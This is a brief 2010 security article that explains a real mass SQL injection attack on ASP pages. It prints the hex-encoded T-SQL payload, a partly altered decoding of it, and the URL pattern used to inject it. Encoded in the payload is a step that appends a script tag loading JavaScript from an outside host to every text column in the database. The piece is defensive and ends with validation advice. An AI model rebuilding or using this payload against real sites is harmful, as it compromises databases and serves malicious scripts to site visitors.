Articles > Information Security
Printer Friendly Version
Views: 9929

Real Life SQL Injection Attack

Last Updated: 9/15/10

Real life example of a SQL injection command embedded in a url:

DECLARE @S VARCHAR(4000);
SET @S=CAST(0x4445434C415245204054205641524348415228323535452C4043205641524 34841522832353529204445434C415245205461626C655F437572736F7220435552534F5220 464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A656 3747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E44 20612E78747970653D27752720414E442028622E78747970653D3939204F5220622E7874797 0653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F 50454E205461626C125F437572736F72204645544348204E4558542046524F4D205461626C6 55F437572736F7220494E544F2040542C4043205748494C4528404046455443485F53544154 55533D302920424547494E20455845432827555044415445205B272B40542B275D205345542 05B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C 5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E617 07035322E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E455854 2046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5 345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F 7220 AS VARCHAR(4000)); EXEC(@S);

This is what the HEX coverts to in standard text commands:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FR0M sysobjects a,sysclumns b WHERE a.id=b.id AND a.xtype='z' AND (b.xtype=99 OR b.xtype=35 0R b.xtype=231 0R b.xtype=137) 0PEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+X@+']))+''''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CL0SE Table_Cursor DEALLOCATE Table_Cursor




Here is how it was injected into the web page:
http:// (domain name here) /asp_script_name.asp?ID=227;DECLARE%20@S%20VARCHAR(4000);SET.....

It is longer than that (see above), but you get the idea of how it was injected into the asp file because there was no validation on the input.

As you can see hackers can be very smart. ALWAYS validate your database input from ALL of your webpages. Remove special characters and limit url variables to numeric values only which are easily validated. This includes on GET variables in your urls and all POST variables in your forms.

Please note that some of this page has been modified to protect the innocent and to prevent stupid people from using this information to attack someone.

If you want more info about this attack and how to prevent similar attacks feel free to contact me.

Helpful Links:
https://download.spidynamics.com/Products/scrawlr/
http://en.wikipedia.org/wiki/Sql_injection
http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx




Keywords: prevent sql injection mysql oracle mssql get post php asp javascript firefox internet explorer ajax form inputs script